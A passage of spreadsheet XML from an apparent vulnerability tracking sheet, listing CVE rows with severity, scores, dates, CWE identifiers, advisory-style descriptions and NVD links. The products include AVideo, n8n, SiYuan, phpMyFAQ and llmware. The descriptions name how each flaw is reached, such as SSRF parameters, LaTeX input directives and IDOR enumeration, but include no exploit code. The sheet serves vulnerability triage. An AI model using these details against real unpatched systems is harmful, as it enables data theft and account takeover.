          <t>Cheshire Cat AI's GET /memory/collections/{collection_id}/points endpoint fails to apply per-user filtering when retrieving episodic memory points. Authenticated attackers with MEMORY:READ permission can retrieve all users' stored conversation messages and personal data by paginating through the collection using the offset cursor.</t>
        </is>
      </c>
      <c r="M3284" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85093</t>
        </is>
      </c>
    </row>
    <row r="3285">
      <c r="A3285" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3285" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85162</t>
        </is>
      </c>
      <c r="C3285" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3285" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3285" s="5" t="inlineStr"/>
      <c r="F3285" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G3285" s="5" t="inlineStr"/>
      <c r="H3285" s="5" t="inlineStr"/>
      <c r="I3285" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J3285" s="5" t="inlineStr"/>
      <c r="K3285" s="5" t="inlineStr">
        <is>
          <t>CWE-352</t>
        </is>
      </c>
      <c r="L3285" s="5" t="inlineStr">
        <is>
          <t>AVideo through commit c91b5975d contains a cross-site request forgery vulnerability in plugin/Live/saveLive.php that lacks forbidIfNotPost and forbidIfInvalidToken protections. Attackers can craft malicious image tags to overwrite authenticated streamers' RTMP keys, passwords, and titles, hijacking live broadcasts.</t>
        </is>
      </c>
      <c r="M3285" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85162</t>
        </is>
      </c>
    </row>
    <row r="3286">
      <c r="A3286" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3286" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85163</t>
        </is>
      </c>
      <c r="C3286" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3286" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3286" s="5" t="inlineStr"/>
      <c r="F3286" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3286" s="5" t="inlineStr"/>
      <c r="H3286" s="5" t="inlineStr"/>
      <c r="I3286" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J3286" s="5" t="inlineStr"/>
      <c r="K3286" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L3286" s="5" t="inlineStr">
        <is>
          <t>AVideo through commit c91b5975d contains a server-side request forgery vulnerability in the EPG parser that allows authenticated uploaders to fetch arbitrary internal URLs. An attacker can supply an internal URL via the epg_link parameter during video upload, which is validated only for syntax and later fetched server-side during EPG generation without SSRF protection checks.</t>
        </is>
      </c>
      <c r="M3286" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85163</t>
        </is>
      </c>
    </row>
    <row r="3287">
      <c r="A3287" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3287" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85164</t>
        </is>
      </c>
      <c r="C3287" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3287" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3287" s="5" t="inlineStr"/>
      <c r="F3287" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3287" s="5" t="inlineStr"/>
      <c r="H3287" s="5" t="inlineStr"/>
      <c r="I3287" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J3287" s="5" t="inlineStr"/>
      <c r="K3287" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L3287" s="5" t="inlineStr">
        <is>
          <t>WWBN AVideo through commit c91b5975d contains a server-side request forgery vulnerability in the set_api_userImages API endpoint that fails to validate profileImg and backgroundImg URLs before fetching them. Authenticated API clients can supply internal URLs to fetch cloud metadata or internal services, with responses written to publicly accessible web paths for retrieval.</t>
        </is>
      </c>
      <c r="M3287" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85164</t>
        </is>
      </c>
    </row>
    <row r="3288">
      <c r="A3288" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3288" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85170</t>
        </is>
      </c>
      <c r="C3288" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3288" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3288" s="5" t="inlineStr"/>
      <c r="F3288" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3288" s="5" t="inlineStr"/>
      <c r="H3288" s="5" t="inlineStr"/>
      <c r="I3288" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J3288" s="5" t="inlineStr"/>
      <c r="K3288" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="L3288" s="5" t="inlineStr">
        <is>
          <t>n8n versions before 1.123.73, 2.35.4, and 2.36.2 pass message content in the Gmail (v1) and Brevo nodes to the mail composer without verifying it is a string. An authenticated user able to run a workflow can supply an expression that resolves to an object carrying a path or href property, causing the composer to read a local file accessible to the n8n process or fetch an internal URL (SSRF) and attach the result to the outgoing message.</t>
        </is>
      </c>
      <c r="M3288" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85170</t>
        </is>
      </c>
    </row>
    <row r="3289">
      <c r="A3289" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3289" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85171</t>
        </is>
      </c>
      <c r="C3289" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3289" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3289" s="5" t="inlineStr"/>
      <c r="F3289" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G3289" s="5" t="inlineStr"/>
      <c r="H3289" s="5" t="inlineStr"/>
      <c r="I3289" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J3289" s="5" t="inlineStr"/>
      <c r="K3289" s="5" t="inlineStr">
        <is>
          <t>CWE-532</t>
        </is>
      </c>
      <c r="L3289" s="5" t="inlineStr">
        <is>
          <t>n8n before 1.123.73, 2.35.4, and 2.36.2 contains a credential exposure vulnerability in the Strapi, SeaTable, and Mailcheck nodes. These nodes send their decrypted credentials to the authentication endpoint via the raw legacy HTTP helper outside any error handling, causing the plaintext secret to be persisted in execution error data. Any authenticated user can read the plaintext secret from their own execution through the REST API, bypassing the blank-value redaction enforced by the credentials API.</t>
        </is>
      </c>
      <c r="M3289" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85171</t>
        </is>
      </c>
    </row>
    <row r="3290">
      <c r="A3290" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3290" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85389</t>
        </is>
      </c>
      <c r="C3290" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3290" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3290" s="5" t="inlineStr"/>
      <c r="F3290" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3290" s="5" t="inlineStr"/>
      <c r="H3290" s="5" t="inlineStr"/>
      <c r="I3290" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J3290" s="5" t="inlineStr"/>
      <c r="K3290" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L3290" s="5" t="inlineStr">
        <is>
          <t>Worklenz before 3.0.0 fails to verify task ownership by organization when resolving task-scoped API endpoints, allowing authenticated users to access another tenant's task data. Attackers can query task endpoints with arbitrary task UUIDs to retrieve work logs, comments, attachments, and project insights belonging to other organizations.</t>
        </is>
      </c>
      <c r="M3290" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85389</t>
        </is>
      </c>
    </row>
    <row r="3291">
      <c r="A3291" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3291" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85390</t>
        </is>
      </c>
      <c r="C3291" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3291" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3291" s="5" t="inlineStr"/>
      <c r="F3291" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3291" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3291" s="5" t="inlineStr"/>
      <c r="I3291" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J3291" s="5" t="inlineStr"/>
      <c r="K3291" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L3291" s="5" t="inlineStr">
        <is>
          <t>Checkmate through 3.11.0 omits the isAllowed role guard middleware on maintenance-window, notification, and check-deletion routes, allowing read-only users to perform administrative actions. Attackers with user-role sessions can create arbitrary maintenance windows to silence alerts, modify notification channels, and delete monitor check history to erase incident evidence.</t>
        </is>
      </c>
      <c r="M3291" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85390</t>
        </is>
      </c>
    </row>
    <row r="3292">
      <c r="A3292" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3292" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85451</t>
        </is>
      </c>
      <c r="C3292" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3292" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3292" s="5" t="inlineStr"/>
      <c r="F3292" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3292" s="5" t="inlineStr"/>
      <c r="H3292" s="5" t="inlineStr"/>
      <c r="I3292" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J3292" s="5" t="inlineStr"/>
      <c r="K3292" s="5" t="inlineStr">
        <is>
          <t>CWE-798</t>
        </is>
      </c>
      <c r="L3292" s="5" t="inlineStr">
        <is>
          <t>MOOS core-moos through 10.4.0 contains a remote process termination vulnerability in the SuicidalSleeper component that uses a hard-coded passphrase for multicast command authorization. Any multicast-reachable peer can enumerate MOOS processes and send termination commands to trigger process shutdown by exploiting the default multicast group and port with the known passphrase.</t>
        </is>
      </c>
      <c r="M3292" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85451</t>
        </is>
      </c>
    </row>
    <row r="3293">
      <c r="A3293" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3293" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85545</t>
        </is>
      </c>
      <c r="C3293" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3293" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3293" s="5" t="inlineStr"/>
      <c r="F3293" s="5" t="inlineStr"/>
      <c r="G3293" s="5" t="inlineStr"/>
      <c r="H3293" s="5" t="inlineStr"/>
      <c r="I3293" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J3293" s="5" t="inlineStr"/>
      <c r="K3293" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="L3293" s="5" t="inlineStr">
        <is>
          <t>There is an Vulnerability in some HikCentral Access Control versions. Authenticated low-privilege users can invoke API interfaces that their role is not authorized to access.</t>
        </is>
      </c>
      <c r="M3293" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85545</t>
        </is>
      </c>
    </row>
    <row r="3294">
      <c r="A3294" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3294" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85578</t>
        </is>
      </c>
      <c r="C3294" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3294" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3294" s="5" t="inlineStr"/>
      <c r="F3294" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3294" s="5" t="inlineStr"/>
      <c r="H3294" s="5" t="inlineStr"/>
      <c r="I3294" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J3294" s="5" t="inlineStr"/>
      <c r="K3294" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L3294" s="5" t="inlineStr">
        <is>
          <t>SiYuan through 3.8.1 contains an authorization bypass vulnerability in the /api/file/getFile endpoint that allows readers to retrieve files from notebooks explicitly configured as Visible:false. Attackers with reader role can access private workspace files including notebook metadata and internal configuration by knowing the hidden notebook identifier and file path.</t>
        </is>
      </c>
      <c r="M3294" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85578</t>
        </is>
      </c>
    </row>
    <row r="3295">
      <c r="A3295" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3295" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85580</t>
        </is>
      </c>
      <c r="C3295" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3295" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3295" s="5" t="inlineStr"/>
      <c r="F3295" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G3295" s="5" t="inlineStr"/>
      <c r="H3295" s="5" t="inlineStr"/>
      <c r="I3295" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J3295" s="5" t="inlineStr"/>
      <c r="K3295" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L3295" s="5" t="inlineStr">
        <is>
          <t>SiYuan versions before v3.8.2 contain a path guard bypass vulnerability in the MCP file-access handler that uses case-sensitive matching on Linux filesystems. Attackers can read the protected publishAccess.json file by requesting case-variant paths like PublishAccess.json to disclose sensitive publish-access configuration and metadata.</t>
        </is>
      </c>
      <c r="M3295" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85580</t>
        </is>
      </c>
    </row>
    <row r="3296">
      <c r="A3296" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3296" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85582</t>
        </is>
      </c>
      <c r="C3296" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3296" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3296" s="5" t="inlineStr"/>
      <c r="F3296" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G3296" s="5" t="inlineStr"/>
      <c r="H3296" s="5" t="inlineStr"/>
      <c r="I3296" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J3296" s="5" t="inlineStr"/>
      <c r="K3296" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="L3296" s="5" t="inlineStr">
        <is>
          <t>SiYuan versions before v3.8.2 contain an unbounded session creation vulnerability in the publish-service Basic Auth handler that allows authenticated attackers to exhaust memory. Attackers can repeatedly authenticate with valid credentials to create persistent session entries without expiry or capacity limits, causing indefinite process memory growth and denial of service.</t>
        </is>
      </c>
      <c r="M3296" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85582</t>
        </is>
      </c>
    </row>
    <row r="3297">
      <c r="A3297" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3297" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85583</t>
        </is>
      </c>
      <c r="C3297" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3297" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3297" s="5" t="inlineStr"/>
      <c r="F3297" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G3297" s="5" t="inlineStr"/>
      <c r="H3297" s="5" t="inlineStr"/>
      <c r="I3297" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J3297" s="5" t="inlineStr"/>
      <c r="K3297" s="5" t="inlineStr">
        <is>
          <t>CWE-59</t>
        </is>
      </c>
      <c r="L3297" s="5" t="inlineStr">
        <is>
          <t>SiYuan versions before v3.8.2 contain a path traversal vulnerability in the reader-accessible file-read endpoint that follows symlinks when opening authorized asset paths. Attackers with reader role can request a logical asset under data/assets/ that is a symlink to a file outside the workspace and receive the target file bytes, bypassing workspace boundary restrictions.</t>
        </is>
      </c>
      <c r="M3297" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85583</t>
        </is>
      </c>
    </row>
    <row r="3298">
      <c r="A3298" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3298" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85590</t>
        </is>
      </c>
      <c r="C3298" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3298" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3298" s="5" t="inlineStr"/>
      <c r="F3298" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G3298" s="5" t="inlineStr"/>
      <c r="H3298" s="5" t="inlineStr"/>
      <c r="I3298" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J3298" s="5" t="inlineStr"/>
      <c r="K3298" s="5" t="inlineStr">
        <is>
          <t>CWE-308</t>
        </is>
      </c>
      <c r="L3298" s="5" t="inlineStr">
        <is>
          <t>phpMyFAQ before 4.1.8 contains an authentication bypass vulnerability in its two-factor authentication (TOTP) disable functionality. The removeTwofactorConfig() handler (reachable via POST /api/user/remove-twofactor) verifies only that the user is logged in and that a valid CSRF token is supplied, then disables TOTP without requiring password re-entry or a current TOTP code. The same downgrade is also reachable inline via PUT /api/user/data/update, which accepts a plain twofactor_enabled form field under the same session+CSRF-only guard. An attacker who has hijacked a user's session can silently strip two-factor protection from any account, including administrator accounts, after which password-only authentication succeeds.</t>
        </is>
      </c>
      <c r="M3298" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85590</t>
        </is>
      </c>
    </row>
    <row r="3299">
      <c r="A3299" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3299" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85591</t>
        </is>
      </c>
      <c r="C3299" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3299" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3299" s="5" t="inlineStr"/>
      <c r="F3299" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3299" s="5" t="inlineStr"/>
      <c r="H3299" s="5" t="inlineStr"/>
      <c r="I3299" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J3299" s="5" t="inlineStr"/>
      <c r="K3299" s="5" t="inlineStr">
        <is>
          <t>CWE-620</t>
        </is>
      </c>
      <c r="L3299" s="5" t="inlineStr">
        <is>
          <t>phpMyFAQ versions before 4.1.8 contain an authentication bypass vulnerability in the user control panel API endpoint that allows authenticated attackers to change account passwords without verifying the current password. Attackers with session access can submit a PUT request to the user data update endpoint with only a CSRF token to silently change any user's password, including administrators, causing irreversible account takeover and victim lockout.</t>
        </is>
      </c>
      <c r="M3299" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85591</t>
        </is>
      </c>
    </row>
    <row r="3300">
      <c r="A3300" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3300" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85603</t>
        </is>
      </c>
      <c r="C3300" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3300" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3300" s="5" t="inlineStr"/>
      <c r="F3300" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G3300" s="5" t="inlineStr"/>
      <c r="H3300" s="5" t="inlineStr"/>
      <c r="I3300" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J3300" s="5" t="inlineStr"/>
      <c r="K3300" s="5" t="inlineStr">
        <is>
          <t>CWE-73</t>
        </is>
      </c>
      <c r="L3300" s="5" t="inlineStr">
        <is>
          <t>Grav versions before 1.10.55 contain a path traversal vulnerability in the admin plugin's Save As action that fails to validate the language code parameter. An authenticated admin user with admin.pages.create permission can supply directory traversal sequences in the lang POST field to write arbitrary .md files outside the pages directory with attacker-controlled content.</t>
        </is>
      </c>
      <c r="M3300" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85603</t>
        </is>
      </c>
    </row>
    <row r="3301">
      <c r="A3301" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3301" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85618</t>
        </is>
      </c>
      <c r="C3301" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3301" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3301" s="5" t="inlineStr"/>
      <c r="F3301" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G3301" s="5" t="inlineStr"/>
      <c r="H3301" s="5" t="inlineStr"/>
      <c r="I3301" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J3301" s="5" t="inlineStr"/>
      <c r="K3301" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L3301" s="5" t="inlineStr">
        <is>
          <t>ConvertX 0.17.0 contains an arbitrary file read vulnerability in the xelatex converter that allows authenticated users to read files by uploading LaTeX files with input directives. Attackers can upload .tex files containing \\input{path} or \\verbatiminput{path} directives to have the TeX engine read arbitrary files accessible to the server process and include them in downloadable PDF output.</t>
        </is>
      </c>
      <c r="M3301" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85618</t>
        </is>
      </c>
    </row>
    <row r="3302">
      <c r="A3302" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3302" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85624</t>
        </is>
      </c>
      <c r="C3302" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3302" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3302" s="5" t="inlineStr"/>
      <c r="F3302" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G3302" s="5" t="inlineStr"/>
      <c r="H3302" s="5" t="inlineStr"/>
      <c r="I3302" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J3302" s="5" t="inlineStr"/>
      <c r="K3302" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L3302" s="5" t="inlineStr">
        <is>
          <t>Blinko 1.8.7 contains a cross-user private note disclosure vulnerability in the noteReferenceList procedure that performs no ownership verification on supplied note identifiers. Authenticated attackers can enumerate sequential note IDs and retrieve complete content of other users' private notes including attachments and tags.</t>
        </is>
      </c>
      <c r="M3302" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85624</t>
        </is>
      </c>
    </row>
    <row r="3303">
      <c r="A3303" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3303" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85654</t>
        </is>
      </c>
      <c r="C3303" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3303" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3303" s="5" t="inlineStr"/>
      <c r="F3303" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G3303" s="5" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="H3303" s="5" t="inlineStr"/>
      <c r="I3303" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J3303" s="5" t="inlineStr"/>
      <c r="K3303" s="5" t="inlineStr">
        <is>
          <t>CWE-1336</t>
        </is>
      </c>
      <c r="L3303" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of special elements used in a template engine in the CDK generator in Amazon awslabs.dynamodb-mcp-server before 2.1.6 might allow a context-dependent actor to execute arbitrary code on the host that deploys the generated application via crafted table, index, or attribute names in a data model file.</t>
        </is>
      </c>
      <c r="M3303" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85654</t>
        </is>
      </c>
    </row>
    <row r="3304">
      <c r="A3304" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3304" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85669</t>
        </is>
      </c>
      <c r="C3304" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3304" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3304" s="5" t="inlineStr"/>
      <c r="F3304" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3304" s="5" t="inlineStr"/>
      <c r="H3304" s="5" t="inlineStr"/>
      <c r="I3304" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J3304" s="5" t="inlineStr"/>
      <c r="K3304" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L3304" s="5" t="inlineStr">
        <is>
          <t>potpie through 2.0.0 fails to verify user ownership on the POST /conversations/{conversation_id}/code-changes/sync endpoint. Authenticated attackers can write arbitrary file changes into other users' conversations by supplying their conversation IDs, allowing unauthorized modification of pending changes.</t>
        </is>
      </c>
      <c r="M3304" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85669</t>
        </is>
      </c>
    </row>
    <row r="3305">
      <c r="A3305" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3305" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85689</t>
        </is>
      </c>
      <c r="C3305" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3305" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3305" s="5" t="inlineStr"/>
      <c r="F3305" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3305" s="5" t="inlineStr">
        <is>
          <t>postgresql</t>
        </is>
      </c>
      <c r="H3305" s="5" t="inlineStr"/>
      <c r="I3305" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J3305" s="5" t="inlineStr"/>
      <c r="K3305" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="L3305" s="5" t="inlineStr">
        <is>
          <t>llmware 0.4.6 contains an SQL injection vulnerability in the collection-database layer (llmware/resources.py) where filter and lookup values are directly string-interpolated into SQL WHERE clauses without parameterization or escaping, in both the SQLite and PostgreSQL backends. The filter validator only checks keys against an allow-list and never sanitizes values. Attacker-controlled filter values reaching the public API via Library.block_lookup and Query.text_query_with_custom_filter / text_query_by_author_or_speaker can neutralize the intended filter to disclose rows the caller was scoped out of (cross-document/cross-collection disclosure); on PostgreSQL the flaw permits boolean- and UNION-based SQL injection.</t>
        </is>
      </c>
      <c r="M3305" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85689</t>
        </is>
      </c>
    </row>
    <row r="3306">
      <c r="A3306" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3306" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85692</t>
        </is>
      </c>
      <c r="C3306" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3306" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3306" s="5" t="inlineStr"/>
      <c r="F3306" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3306" s="5" t="inlineStr"/>
      <c r="H3306" s="5" t="inlineStr"/>
      <c r="I3306" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J3306" s="5" t="inlineStr"/>
      <c r="K3306" s="5" t="inlineStr">
        <is>
